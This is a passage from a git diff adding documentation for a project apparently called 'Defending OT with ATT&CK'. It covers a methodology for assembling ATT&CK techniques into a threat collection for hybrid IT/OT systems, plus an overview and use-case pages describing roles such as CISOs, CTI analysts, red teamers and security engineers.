adversarial techniques for each listed asset. + +**Actions:** + +* Consult CTI Sources + + * Use sources like MITRE's ATT&CK for Enterprise and ICS. + +* Generate Comprehensive List + + * Combine adversarial techniques relevant to each type of asset. + +* Categorize Techniques + + * Based on asset types such as ICS, Linux, Cloud (e.g., IaaS, SaaS), Containers, Windows, Azure AD, and Network. + +**Key Focus Areas:** + +* Industrial Control Systems (ICS) +* Operating Systems (Linux, Windows) +* Cloud Services (AWS, Azure, GCP) +* Containers (Docker) +* Identity Management (Azure AD) + +Step 3. Define selection criteria. +---------------------------------- + +This next step develops the criteria to determine which candidate techniques are down selected into +the final collection. Selection criteria should offer clear guidance when evaluating all adversarial +risks from the compiled assets, domains and platforms. Develop guidelines for including or excluding an +adversary activity from the threat model. Selection criteria includes virtualized infrastructure (e.g., +virtual machines, cloud), physical technologies (e.g., identity access management servers, network), and +operational technologies (e.g., PLC, HMI). + +Assets with adversarial risks that overlap ATT&CK for Enterprise and ATT&CK for ICS include: + +* Control Servers +* Human-Machine Interfaces (HMIs) +* Jump Hosts +* Application Servers +* Engineering Workstations +* Routers in OT Networks +* Data Historians +* VPN Servers +* Firewalls + +**Objective:** Establish criteria for selecting or excluding adversarial techniques based on asset relevance. + +**Actions:** + +* Develop Criteria + + * Provide clear guidelines for evaluating adversarial techniques. + +* Identify Overlapping Techniques + + * Especially those affecting both ATT&CK for Enterprise and ICS. + +* Evaluate Impact + + * Focus on feasible techniques that could impact assets or operational networks. + +* Generate an initial list of adversarial techniques for each asset type in the architecture. + +**Guidance:** + +* Select relevant adversarial techniques for each asset. +* Exclude techniques that are N/A for each asset. +* Evaluate potential impact to ICS and operational network. + +Step 4. Review applicable adversarial techniques. +------------------------------------------------- + +The fourth step determines which techniques to include in the threat collection. Review and +evaluate adversary techniques for each asset according to previously defined criteria to curate +the list of adversarial techniques for each asset for the final collection. Exclude any +non-applicable techniques. + +**Objective:** Curate a refined list of adversarial techniques for each asset. + +**Actions:** + +* Review and Curate + + * Collaborate with SMEs to review techniques. + +* Document Reasoning + + * Include notes explaining the inclusion or exclusion of techniques. + +* Determine Final Threat Collection + + * Determine the final set of techniques for the threat collection. + +**Guidance:** + +* Include comments to explain the reasoning for the inclusion or exclusion of techniques. + + * These annotations are helpful later for extending, modifying, or updating the collection when the underlying architecture changes. + * The rationale for each technique can clarify ambiguities in the process. + +Step 5. Build custom threat collection. +--------------------------------------- + +The final step is to assemble the techniques into a custom threat collection. Generate a tailored +threat intelligence collection for hybrid IT/OT systems. Provide the collection in a sharable and +extensible format, preferably a machine-readable STIX bundle, to share throughout the organization +or externally. + +**Objective:** Assemble the selected techniques into a shareable threat collection. + +**Actions:** + +* Assemble Techniques + + * Create a threat collection in a machine-readable format (e.g., STIX bundle). + +* Share Collection + + * Distribute the threat collection throughout the organization for awareness and defense preparation. + * Externally publish the collection to benefit the community. + * Please see the `guidance for contributors `_ if are you interested in contributing to the Center's repository. + +**Guidance:** + + * Utilize tools like the Center's `ATT&CK Workbench `_ for compilation. \ No newline at end of file diff --git a/docs/overview.rst b/docs/overview.rst new file mode 100644 index 0000000..8552820 --- /dev/null +++ b/docs/overview.rst @@ -0,0 +1,66 @@ +Overview +======== + +Organizations need to understand which techniques adversaries can use against +Operational Technology (OT) systems. This includes: + +* techniques that occur on enterprise systems used to manage OT, + +* techniques on Industrial Control Systems (ICS), and + +* techniques on OT assets that run similar operating systems, protocols, and applications as enterprise IT assets. + +Defending OT with ATT&CK provides a customized collection of MITRE ATT&CK® techniques +tailored to the attack surface and threat model for OT environments. Historical attacks +against OT and adversarial tactics, techniques, and procedures (TTPs) as contained in +ATT&CK for Enterprise, ATT&CK for ICS, and other relevant ATT&CK datasets such as Cloud +and Containers were analyzed to identify and define a reference architecture and technology +domains of interest specific to OT. The resultant collection can be used by organizations +that use OT to evaluate, plan, and employ security controls based on known, real-world +adversary behaviors targeting those environments. + +Background +---------- +`MITRE ATT&CK® `_ is a globally accessible knowledge +base of cyber adversary tactics and techniques based on public reporting and +observation. The ATT&CK knowledge base represents adversary goals as tactics +and specific goal-oriented behaviors as techniques and sub-techniques. Defending +OT with ATT&CK leverages the knowledgebase and its underlying data model to +produce a collection of ATT&CK techniques tailored to OT environments. + +Initially, ATT&CK was focused on the Windows enterprise environment. Later versions +integrated macOS and Linux into what is commonly known as ATT&CK for Enterprise. +With broader adoption and numerous contributions from the cybersecurity community, +ATT&CK eventually added Mobile and ICS technology domains. + +A typical OT environment spans multiple platforms (e.g., Linux and Microsoft Azure) +and even spans technology domains (e.g., Enterprise and ICS). These complex environments +require cyber defenders to track adversary behaviors that are defined across multiple +matrices and platforms in the ATT&CK knowledgebase. Keeping track of techniques across +different ATT&CK matrices can be difficult, and some techniques may not apply to a +particular environment or architecture. To that end, this project defines a reference +architecture and a corresponding attack surface, then creates mappings of relevant +techniques from multiple matrices to provide a single, convenient collection of resources. + +Prior research into communicating adversary behaviors facing OT networks was conducted by +`Mandiant Threat Intelligence and MITRE `_. The analyis included techniques contained in +ATT&CK for Enterprise and ATT&CK for ICS, represented in a hybrid view of the complexity of events +across the OT Targeted Attack Lifecycle. The figure below reflects the differences and overlaps +between ATT&CK for Enterprise and ATT&CK for ICS. + +.. image:: ./_static/enterprise_ics.png + +Get Involved +------------ + +This project provides the community with resources for understanding of the attack surface +and threat model for various assets within a hybrid IT/OT architecture and environment. There are +several ways that you can get involved with this project and help advance threat-informed defense: + +* **Use the project resources.** Visit the :doc:`architecture` and :doc:`collection` to learn how the project resources are constituted and how you can use them. + +* **Apply the methodology.** The Defending OT resources are usable as-is, but you can also learn how to create your own customized collections by following the :doc:`methodology`. + +* **Build and share your own collections.** Use `ATT&CK Workbench `_ to build your own collections. You can use custom collections privately or publish them to benefit the community. + +* **Tell us what you think.** Let us know how you're using the project and what ideas you have to improve it. Please see the `guidance for contributors `_ if are you interested in contributing or reporting issues. \ No newline at end of file diff --git a/docs/use cases.rst b/docs/use cases.rst new file mode 100644 index 0000000..07315e0 --- /dev/null +++ b/docs/use cases.rst @@ -0,0 +1,99 @@ +Use Cases +========= + +The Defending OT with ATT&CK reference architecture, threat collection, and methodology are +valuable resources for cyber professionals encompassing many roles and responsibilities +associated with organizational cyber defense, risk management, and threat prevention. The +resources provide a customized collection of adversary behaviors tailored to the attack surface +and threat model for OT environments that support a variety of capabilities and use cases. The +following is not meant to be a comprehensive list, but rather examples to demonstrate how project +resources could be used. + +Users +----- + +The existing communities providing, securing, and maintaining OT systems and +environments include many roles and responsibilities associated with cybersecurity +processes and procedures. These roles and responsibilities include: + +**Chief Information Security Officer (CISO)** + Responsible for carrying out information security policies, procedures, and controls, + and providing primary interface between senior managers and information system owners. + +**Information System Security Officer (ISSO)** + Responsibilities include ensuring the appropriate operational security posture + is maintained for information systems or programs. + +**Cyber Threat Intelligence (CTI) Analyst** + Responsibilities include collecting data and information from across the threat + landscape to identify, assess, and recommend countermeasures for cyber threats. + +**Red Team (RT) Engineer** + Responsibilities include conducting security exercises that emulate real-world + cyber threats to assess and improve the effectiveness of defensive measures. + +**Security Engineer (SE)** + Responsibilities include identifying, developing, and implementing security controls + and solutions to protect networks and systems from unauthorized access and attacks. + +Usage +----- + +Defending OT with ATT&CK enables the following essential capabilities: + +**Threat Intelligence Mapping** + Users can leverage ATT&CK's full range of OT-related technique mappings used by + real-world threat actors to describe adversary activities during a security event + and understand how their behaviors may impact assets across an environment. + +**Red Teaming and Penetration Testing** + Users can apply the project resources to conduct strategic adversarial simulations, + including red teaming and penetration testing, to effectively evaluate real-world + risks across the attack surface. + +**Improved Security Architecture and Operations** + Users can use the mapped information to more easily identify security control gaps + to protect systems and environments from threats, develop detections for adversary + activity, and plan appropriate response activities across their IT/OT environment. + +**Cyber Tabletop Exercises** + Users can use project resources to conduct collaborative cyber tabletop exercises + that passively evaluate adversarial risks and use combined participant knowledge and + expertise to evaluate the employed organizational mitigating security technologies. + +User Stories +------------ + +This section describes user stories based on the roles identified above. These user stories +are expressed as the who, what, and why, with a short exploration of how a user story may be +achieved. + +**As a CISO/ISSO, I want to understand how our current security posture addresses real-world threats that my organization is likely to encounter:** + Defending OT with ATT&CK provides a customized collection of ATT&CK techniques tailored + to the attack surface and threat model for OT environments. The resulting resources can + be used to conduct threat vector based compromise scenarios based on real-world adversary + behaviors targeting IT/OT environments. These scenarios provide understanding of actual + threats and risks and that knowledge can be applied to evaluate and employ appropriate + security controls and mitigations. + +**As a CTI analyst, I need to know that we have sufficient countermeasures for threats against my organization:** + The Defending OT with ATT&CK resources can be used by CTI analysts to understand and + evaluate adversary activities associated specifically with OT systems and environments. + Visiting the narrative pages for the mapped ATT&CK techniques and sub-techniques will + provide information about behavior detections and mitigations, and often include links + to available tools. This information can help CTI analysts recommend countermeasures + for their IT/OT environments. + +**As a RT engineer, I want to have a complete picture of my organization's attack surface and how it can be abused, to improve defensive measures:** + The Defending OT with ATT&CK mappings provide a framework to comprehensively describe + adversary behaviors at a flexible level across multiple platforms and technology domains. + The resources provide RT engineers with adversarial techniques and scenarios that can be + used for understanding their attack surface and identifying cyber defensive capabilities + to mitigate threats to their systems and environments. + +**As a SE, I want to understand what mitigations are necessary to prevent classes of attacker activity:** + SEs can use the Defending OT with ATT&CK resources to evaluate and employ security controls + and mitigations for real-world adversary behaviors associated specifically with attacks targeting + IT/OT systems used in OT environments. Most ATT&CK techniques and sub-techniques include information about + relevant mitigations, and examination and correlation of these can suggest control improvements + that can mitigate entire classes of adversary activity as well as individual threats. \ No newline at end of file